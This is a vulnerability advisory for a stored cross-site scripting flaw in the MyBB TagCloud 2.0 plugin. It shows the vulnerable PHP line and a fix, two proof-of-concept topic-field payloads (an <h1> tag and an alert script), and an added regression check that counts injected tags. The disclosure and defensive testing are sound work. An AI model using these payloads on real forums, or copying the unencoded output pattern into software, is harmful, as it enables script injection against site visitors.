====================================================
MYBB TagCloud 2.0 cross site scripting vulnerability
====================================================

Author: http://www.3ethicalhackers.com
Discovered by: http://www.3ethicalhackers.com
Original post: http://www.3ethicalhackers.com

=====================================================================

Description:
MYBB TagCloud 2.0 is an open source plugin used to show all recent posts.

How to exploit:
Enter HTML or JavaScript into the topic field. The plugin writes the thread subject into the page without encoding it (see the vuln code below), so once TagCloud displays the thread, the code that was set within the topic field executes in the browser of whoever views the page.

Download Link: http://www.mybbcentral.com/thread-1681.html
Number of times downloaded: 402

=====================================================================

[ vuln code ]

$message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".$thread['subject']."</span></a> |\r\n";

[ Fixed Code ]

$message .= "<a href=\"".$mybb->settings['bburl']."/showthread.php?tid=".$thread['tid']."\"><span style=\"font-size:".$sizes[$fontsize]."px\">".htmlentities($thread['subject'])."</span></a> |\r\n";

=====================================================================

[ proof of concept ]

Topic Field: <h1>LOLIMADEEVERYTHINGBIG!
^once tagcloud displays that piece of code, everything within the tagcloud will become huge ;D

Topic Field: <script>javascript:alert("lolcats")</script>
^once tagcloud displays that piece of code, a message will pop up saying "lolcats"

======================================================================
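
[ added example ]

The vuln code and Fixed Code lines above, rebuilt as a stand-alone regression check. This is an added example, not code from the plugin or from the advisory's author. The function names, the $bburl value and the sample threads are constructed for illustration; subjects 2 and 3 are the advisory's own proof-of-concept strings. It pins the charset and quote flags explicitly, which the bare htmlentities() call leaves to PHP's version-dependent defaults.

```php
<?php
// Added example (assumed names, constructed data); not the plugin's code.

function tagcloud_link_vulnerable(string $bburl, array $thread, int $px): string
{
    // Same pattern as the advisory's "vuln code": the subject is concatenated raw.
    return "<a href=\"" . $bburl . "/showthread.php?tid=" . $thread['tid'] . "\">"
         . "<span style=\"font-size:" . $px . "px\">" . $thread['subject'] . "</span></a> |\r\n";
}

function tagcloud_link_hardened(string $bburl, array $thread, int $px): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    // Encode for the HTML context. ENT_QUOTES also covers single quotes;
    // ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
    $subject = htmlspecialchars((string) $thread['subject'], $flags, 'UTF-8');
    // The thread id is numeric: cast it rather than trust the stored value.
    $href = htmlspecialchars($bburl . "/showthread.php?tid=" . (int) $thread['tid'], $flags, 'UTF-8');
    return "<a href=\"" . $href . "\"><span style=\"font-size:" . $px . "px\">"
         . $subject . "</span></a> |\r\n";
}

// Constructed sample data.
$bburl   = 'http://forum.example';
$threads = [
    ['tid' => 1, 'subject' => 'Welcome & rules'],
    ['tid' => 2, 'subject' => '<h1>LOLIMADEEVERYTHINGBIG!'],
    ['tid' => 3, 'subject' => '<script>javascript:alert("lolcats")</script>'],
    ['tid' => 4, 'subject' => "caf\xE9 (invalid UTF-8 byte)"],
];

foreach ($threads as $t) {
    $raw  = tagcloud_link_vulnerable($bburl, $t, 12);
    $safe = tagcloud_link_hardened($bburl, $t, 12);

    // The template itself emits exactly four "<": <a>, <span>, </span>, </a>.
    // Any extra "<" means markup from the subject reached the page.
    $rawTags  = substr_count($raw, '<');
    $safeTags = substr_count($safe, '<');

    printf("tid=%d  raw '<' count=%d (%s)  hardened '<' count=%d (%s)\n",
        $t['tid'],
        $rawTags,  $rawTags  === 4 ? 'ok' : 'INJECTED',
        $safeTags, $safeTags === 4 ? 'ok' : 'INJECTED');
    echo '  hardened: ', rtrim($safe), "\n";
}
```

The same count check can be run against the plugin's rendered output after patching, to confirm no subject-supplied tag survives.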